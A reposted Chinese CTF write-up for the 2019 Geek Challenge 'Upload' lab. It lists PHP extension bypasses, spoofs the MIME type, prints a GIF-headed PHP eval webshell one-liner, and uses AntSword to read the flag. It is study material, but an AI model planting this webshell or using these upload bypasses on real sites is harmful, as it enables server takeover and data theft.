[极客大挑战 2019]Upload
Posted wangtanzhi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]Upload相关的知识,希望对你有一定的参考价值。
0x00 知识点
一个常规上传题目,知识点全都来自前几天写的文章:
https://www.cnblogs.com/wangtanzhi/p/12243206.html
1:某些情况下绕过后缀名检测:
php,php3,php4,php5,phtml.pht
2:常用一句话:
GIF89a? <script language="php">eval($_REQUEST[shell])</script>php5适用
3:文件类型绕过
改成image/jpeg
0x01 解题
做如下修改:
蚁剑连接:
http://3915f5e8-a730-4ca3-80c1-572b9cff8776.node3.buuoj.cn/upload/1.phtml
访问:
文件太多了 我们直接在终端cat /flag
右键 虚拟终端:
以上是关于[极客大挑战 2019]Upload的主要内容,如果未能解决你的问题,请参考以下文章
(文件上传upload) [极客大挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag